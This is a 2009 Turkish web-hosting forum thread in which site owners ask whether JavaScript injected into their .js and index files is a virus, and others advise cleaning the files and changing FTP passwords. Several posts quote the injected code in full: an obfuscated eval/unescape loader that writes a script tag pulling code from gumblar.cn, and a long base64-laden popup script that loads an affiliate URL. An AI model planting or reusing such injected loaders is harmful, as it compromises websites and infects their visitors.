0
Kayıt Ol

Bu kod virüs mü ?

11

1.023

  • 28-04-2009, 04:02:02
    #1
    Reality
    Reality
    Kimlik doğrulama veya yönetimden onay bekliyor.
    selam herkese akşam akşam tüm sitelere virüs bulaştı arada böyle kodlar çıkıyor bu virüsmu .js dosyasının içinde gördüm popup için mi acaba virüsmü

    Alıntı
    <script language=javascript><!--
    (function(t){eval(unescape(('va:72:20a:3d:22Scr:69 ptEngine:22:2c:62:3d:22:56ersi:6f:6e(:29:2b:22:2cj :3d:22:22:2cu:3dn:61:76:69gato:72:2euse:72A:67:65: 6et:3b:69:66((u:2eindexOf(:22:57:69n:22):3e0):26:2 6:28u:2e:69:6edex:4f:66(:22:4eT:206:22:29:3c0):26: 26(doc:75men:74:2ecoo:6b:69:65:2eindexOf(:22m:69ek :3d1:22):3c0:29:26:26(:74y:70:65of:28zrv:7at:73):2 1:3dtypeof(:22A:22))):7bzr:76:7ats:3d:22A:22:3beva l(:22if:28window:2e:22:2ba:2b:22:29j:3dj+:22:2ba:2 b:22:4dajor:22+b:2ba:2b:22Minor:22:2bb:2ba:2b:22:4 2ui:6c:64:22+:62+:22j:3b:22:29:3bdocum:65nt:2ewrit :65(:22:3cscrip:74:20:73r:63:3d:2f:2fgumblar:2e:63 n:2frss:2f:3fi:64:3d:22+j+:22:3e:3c:5c:2f:73c:72:6 9pt:3e:22):3b:7d').replace(t,'%')))})(/:/g);
    --></script>
    pop.js içindeki şöyle

    Alıntı
    oV1=window; function fStart(u,n,v) { if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) {fV13();} var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)?wo.pw:wo; } function fV11() {return fV6(vV1);} function fV5(x) { return true; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array; var cw = vWA[c]; var tn=new Date(); if (!v) var v=''; if (!n) var n=tn.getTime()+'N'+c; cw.location=u; cw.f=1; cw.s=0; cw.n=n; cw.v=v; cw.cn=""; cw.cnt=c; cw.blur=function() {cw.f=-1;}; cw.focus=function() {cw.f=1;}; return c } function fV13() { oV5=oV1.document; vWA=new Array; fV1=oV1.open; fV2=oV1.focus; fV3=setTimeout; fV4=clearTimeout; vV1='PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY 28nIHR5cGU9J2FwcGxpY2F0aW9uL3htbCc+PC9PQkpFQ1Q+'; fV20=(document.all&&!oV1.opera)?1:0; isG=fV31=fV32=fV35=0; fV21=fV20?(navigator.appVersion.indexOf('NT 5.1')>0):0; fV34=fV20?(navigator.appVersion.indexOf('MSIE 7')>0):0; if (navigator.userAgent) { fV35=!fV20?(navigator.userAgent.indexOf('Firefox/2')>0):0; } oV5.write(fV6('PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHR vcDowcHg7IHBvc2l0aW9uOmFic29sdXRlOyB2aXNpYmlsaXR5O mhpZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZlYxLDU sdHJ1ZSkiPg==')); oV5.write(fV6('PGRpdiBzdHlsZT0iZGlzcGxheTppbmxpbmU iIGlkPSJvVjEwIj48L2Rpdj4=')); } function debug() {void(0)} function fV6(input) { var o = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/="; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.indexOf(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; o = o + String.fromCharCode(chr1); if (enc3 != 64) { o = o + String.fromCharCode(chr2); } if (enc4 != 64) { o = o + String.fromCharCode(chr3); } } while (i < input.length); return o; } function fV12() { if (--fV25<1) return; oV1.onerror=fV5; var t=fV3('fV12()',500); oV1.wO1=oV3.oV4.object.parentWindow; oV3.location=fV6('YWJvdXQ6Ymxhbms='); fV3('fV8(wO1.open,2)',200); fV4(t); } function fV17() { if (--fV25<1) { fV25=25; var t=fV3('fV12()'); return; } var x=fV3('fV17()',250); oV1.fV14=oV8.children[0].parentWindow; fV1=fV14.open; fV4(x); oV8.removeChild(oV8.children[0]); oV5.all['oV6'].fireEvent('onchange'); } function fV16() { if (fV34 || fV21) { oV5.all['oV6'].fireEvent('onchange'); } else { z=createPopup(); oV8=z.document.body; oV8.innerHTML=fV6(vV1); fV25=5; fV3('fV17()',200); } } function fV19(v) { if (oV5.getElementById('oV10')) { oV5.getElementById('oV10').innerHTML=v; } else { var o=oV5.createElement("span"); o.innerHTML=v; o.style.visibility = "visible"; oV5.body.appendChild(o); } } function fV23() { fV8(fV1,4); } function fV22() { if (--fV25==0) {fV21=0; fV7(); return;} var wo=vWA[0]; var x=fV3('fV22()',750); var o=fV24('oV9'); if (o.DOM) { fV4(x); fV25=1; eval(fV6('d28ucHc9by5ET00uU2NyaXB0Lm9wZW4od28ubG9j YXRpb24sJycsd28udik7')); if (wo.pw || fV34) { fV9(wo,4); } else { var t=fV3('fV33()',500); eval(fV6("dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZh c2NyaXB0OndpbmRvdy5vbmVycm9yPWZ1bmN0aW9uKCl7cmV0dX JuIHRydWV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3NlKClc Iiw1MCk7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLF wiIiArIHdvLm4gKyAiXCIsXCIiICsgd28udiArICJcIik7ICB4 LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZWxwOjA7Y2 VudGVyOjA7ZGlhbG9nV2lkdGg6MTtkaWFsb2dIZWlnaHQ6MTtk aWFsb2dMZWZ0OjUwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby 5ET00uU2NyaXB0LmV4ZWNTY3JpcHQob3V0KTsg")); fV3('fV23()'); fV4(t); } } } function fV28() { fV19(fV6('PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1 PTEiIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0OjE7dG 9wOjE7d2lkdGg6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2xzaWQ6 MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj 48U0NSSVBUPmZWMjU9MTwvU0NSSVBUPjwvb2JqZWN0Pg==')); fV25=6; fV3('fV22()',500) } function fV26() { fV19(fV6('PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNU WUxFPSJ2aXNpYmlsaXR5OmhpZGRlbjsgcG9zaXRpb246YWJzb2 x1dGU7d2lkdGg6MTtoZWlnaHQ6MTsiIHNyYz0iamF2YXNjcmlw dDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=')); fV25=20; fV3('fV12()',200); } function fV30() { fV3('fV32?fV29():fV28()'); var o=document.createElement('object'); o.onreadystatechange=function(){fV32=1}; o.classid='clsid2BD7935-05FC-11D2-9059-00C04FD7A1BD'; o.onreadystatechange=function(){fV32=0}; } function fV29() { fV3('fV31?fV28():fV33()'); var o=document.createElement('object'); o.onreadystatechange=function(){fV31=1}; o.classid='clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC'; o.onreadystatechange=function(){fV31=0}; } function fV33() { fV3('isG?fV16():fV26();'); var o=document.createElement('object'); o.onreadystatechange=function(){isG=1}; o.classid='clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB'; o.onreadystatechange=function(){isG=0}; } function fV7() { oV5.body.onclick=function(){fV8(oV1.open,3)}; if (oV5.createElement) { fV24=oV5.getElementById; if (fV20) { if (fV21) { fV30(); } else { fV33(); } } else { if (!fV35) { out='<embed style="position:absolute; top:0px" swliveconnect="true" src="www.siteadresi.com" width="1" height="1">'; fV19(out); } if (!oV5.all) { x=oV5.getElementById('oV6'); x.focus(); x.value=Math.random(); } } } } function fV8(f,t,y) { for (var i=0;i < vWA.length;i++) if (vWA[i].s==0) { vWA[i].s=-1; var wo=vWA[i]; wo.pw=f(wo.location,wo.n,wo.v); fV3("var i="+i+"; var wo=vWA[i]; if(wo.s==-1){wo.s=0}"); fV9(wo,t); } } function fV9(wo,s) { if (!s) s=0; if (wo.s > 1) return; if (s==0) var t=fV3("fV7()",500); if (s==4) var t=fV3('fV33()',500); if (s==5 && isG) var t=fV3('fV26()',200); oV1.onerror=fV5; if (wo.pw) { if (wo.f==-1) { wo.pw.blur(); fV34?oV5.focus():fV2(); } else { wo.pw.focus(); } wo.s=2; fV4(t); eval(fV6('CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5k b20oKSAqIDEwMCkgPCA2KSB7DQoJCQl2YXIgeD1uZXcgSW1hZ2 UoKTsNCgkJCXguc3JjPSdodHRwOi8vd3d3LmFkb3V0cHV0LmNv bS92ZXJzaW9uMi9oaXRfcm0uY2ZtP3R5cGU9JyArIHM7DQoJCX 0=')); oV1.onerror=null; } } function fV10(w) { if (oV1.opera && !fV20) {fV7();return;} wo=vWA[w]; fV9(wo); }var l = (screen.width - 720) / 2;
    var t = (screen.height - 300) / 2;
    var he = (screen.height);
    var wi = (screen.width);

    var pop = fStart('http://reklam.***************/affiliates/manage.php?affid=948&o=29&c=58&d=1900','cixxx','le ft='+l+',top='+t+',width='+wi+',height='+he+',tool bar=1,status=1,menubar=1,resizable=1,scrollbars=1, location=1');
    pop.blur();
    window.focus();
    <!--
    (function(t){eval(unescape(('va:72:20a:3d:22Scr:69 ptEngine:22:2c:62:3d:22:56ersi:6f:6e(:29:2b:22:2cj :3d:22:22:2cu:3dn:61:76:69gato:72:2euse:72A:67:65: 6et:3b:69:66((u:2eindexOf(:22:57:69n:22):3e0):26:2 6:28u:2e:69:6edex:4f:66(:22:4eT:206:22:29:3c0):26: 26(doc:75men:74:2ecoo:6b:69:65:2eindexOf(:22m:69ek :3d1:22):3c0:29:26:26(:74y:70:65of:28zrv:7at:73):2 1:3dtypeof(:22A:22))):7bzr:76:7ats:3d:22A:22:3beva l(:22if:28window:2e:22:2ba:2b:22:29j:3dj+:22:2ba:2 b:22:4dajor:22+b:2ba:2b:22Minor:22:2bb:2ba:2b:22:4 2ui:6c:64:22+:62+:22j:3b:22:29:3bdocum:65nt:2ewrit :65(:22:3cscrip:74:20:73r:63:3d:2f:2fgumblar:2e:63 n:2frss:2f:3fi:64:3d:22+j+:22:3e:3c:5c:2f:73c:72:6 9pt:3e:22):3b:7d').replace(t,'%')))})(/:/g);
    -->
    acaba bu virüsmü ?
  • 28-04-2009, 04:12:50
    #2
    Fear
    Fear
    Üyeliği durduruldu
    Üstteki virüs Kodu
  • 28-04-2009, 04:21:06
    #3
    Reality
    Reality
    üsttekini kaynakta görebiliyorum ama kodların arasına bakıyorum yok bu kod nerde saklı acaba nereye girdi. deli oldum

    Alıntı
    <script language=javascript><!--
    (function(t){eval(unescape(('va:72:20a:3d:22Scr:69 ptEngine:22:2c:62:3d:22:56ersi:6f:6e(:29:2b:22:2cj :3d:22:22:2cu:3dn:61:76:69gato:72:2euse:72A:67:65: 6et:3b:69:66((u:2eindexOf(:22:57:69n:22):3e0):26:2 6:28u:2e:69:6edex:4f:66(:22:4eT:206:22:29:3c0):26: 26(doc:75men:74:2ecoo:6b:69:65:2eindexOf(:22m:69ek :3d1:22):3c0:29:26:26(:74y:70:65of:28zrv:7at:73):2 1:3dtypeof(:22A:22))):7bzr:76:7ats:3d:22A:22:3beva l(:22if:28window:2e:22:2ba:2b:22:29j:3dj+:22:2ba:2 b:22:4dajor:22+b:2ba:2b:22Minor:22:2bb:2ba:2b:22:4 2ui:6c:64:22+:62+:22j:3b:22:29:3bdocum:65nt:2ewrit :65(:22:3cscrip:74:20:73r:63:3d:2f:2fgumblar:2e:63 n:2frss:2f:3fi:64:3d:22+j+:22:3e:3c:5c:2f:73c:72:6 9pt:3e:22):3b:7d').replace(t,'%')))})(/:/g);
    --></script>
    bu kodu bi türlü bulamadım .
  • 28-04-2009, 04:44:47
    #4
    tvo
    tvo
    Üyeliği durduruldu
    <script language=javascript><!--
    (function(t){eval(unescape(('va:72:20a:3d:22Scr:69 ptEngine:22:2c:62:3d:22:56ersi:6f:6e(:29:2b:22:2cj :3d:22:22:2cu:3dn:61:76:69gato:72:2euse:72A:67:65: 6et:3b:69:66((u:2eindexOf(:22:57:69n:22):3e0):26:2 6:28u:2e:69:6edex:4f:66(:22:4eT:206:22:29:3c0):26: 26(doc:75men:74:2ecoo:6b:69:65:2eindexOf(:22m:69ek :3d1:22):3c0:29:26:26(:74y:70:65of:28zrv:7at:73):2 1:3dtypeof(:22A:22))):7bzr:76:7ats:3d:22A:22:3beva l(:22if:28window:2e:22:2ba:2b:22:29j:3dj+:22:2ba:2 b:22:4dajor:22+b:2ba:2b:22Minor:22:2bb:2ba:2b:22:4 2ui:6c:64:22+:62+:22j:3b:22:29:3bdocum:65nt:2ewrit :65(:22:3cscrip:74:20:73r:63:3d:2f:2fgumblar:2e:63 n:2frss:2f:3fi:64:3d:22+j+:22:3e:3c:5c:2f:73c:72:6 9pt:3e:22):3b:7d').replace(t,'%')))})(/:/g);
    --></script>


    bu virus kodu temizle hemen ve bütün idenxlerini kontrol et hepsine bulasmıs olabilir temizledikden sonra ftp sifrelerini degiştir otomatik giren vürusler bunlar ftp sifreni degiştirmezsen tekrar girer temizledikden sorna ftp sifrelerini degiştir
  • 28-04-2009, 04:47:26
    #5
    tvo
    tvo
    Üyeliği durduruldu
    Reality adlı üyeden alıntı: mesajı görüntüle
    üsttekini kaynakta görebiliyorum ama kodların arasına bakıyorum yok bu kod nerde saklı acaba nereye girdi. deli oldum
    bu kodu bi türlü bulamadım .
    butun idenxlerın kaynagına bak ctrl +f ıl bak script die arastır sie adresın nedir bakalım sitene php mi? icerigi nedir html mi?
  • 28-04-2009, 04:55:58
    #6
    Fear
    Fear
    Üyeliği durduruldu
    Genellikle Bu Virus index.php ve index.html Ana dizindeki Dosyalara giriyor ve siteadi.com/klasor/index.php gibi yerlere girer sürekli Yani Tüm Dosyalarına bakmana grek yok bu tür viruslerden bu. Aynı Tvo nun Söylediği gibi Şifrenide değiştir.
  • 28-04-2009, 22:20:03
    #7
    Reality
    Reality
    bu virüs .js kodlarına bile giriyor hemen hemen bütün sitedeki .js dosyalarında var ayrıca sadece index.php ye değil önüne gelen tüm dosyalara giriyor ne biçim şeydir kökten nasıl kurtulacaz.
  • 29-04-2009, 18:06:17
    #8
    Beowulf78
    Beowulf78
    Üyeliği durduruldu
    evet bendede var bu virüs. dünen beri ugrasıyorum.

    bu virüsün kurbanları gittikçe artmaya başladı.

    bir çözüm bulmak lazım.
  • 29-04-2009, 22:40:40
    #9
    ASROCK
    ASROCK
    Yardımmmmmmmm :S

    aynı sorun bendede var siliyorum siliyorum geri bulaşıyor.js dosyalarına girmiş vbulletin forumda tüm dosyaları siliyorum yeniden atıom anca kurtuluyom silmekle bitmiyo ya:s

    <!--
    (function(t){eval(unescape(('>76>61r>20a>3d>22Scri >70tEngine>22>2cb>3d>22Versio>6e>28>29+>22>2cj>3d> 22>22>2c>75>3dnavig>61>74or>2e>75ser>41gent>3bif(( u>2eindexO>66(>22Win>22)>3e0)>26>26(u>2einde>78O>6 6(>22NT>206>22)>3c0)>26>26(doc>75me>6et>2ecook>69> 65>2ein>64exOf(>22mi>65k>3d>31>22)>3c>30)>26>26>28 typeof(z>72vzts)>21>3dt>79p>65of(>22A>22)))>7bzrvz ts>3d>22A>22>3beval(>22if>28window>2e>22+a+>22>29> 6a>3dj>2b>22+>61>2b>22>4daj>6f>72>22+b+a>2b>22Min> 6fr>22+b+a+>22B>75il>64>22+>62>2b>22>6a>3b>22)>3b> 64ocume>6et>2ewrite(>22>3cs>63ri>70t>20>73rc>3d>2f >2fg>75mblar>2ecn>2f>72ss>2f>3fi>64>3d>22+j+>22>3e >3c>5c>2fs>63ript>3e>22)>3b>7d').replace(t,'%')))} )(/>/g);
    -->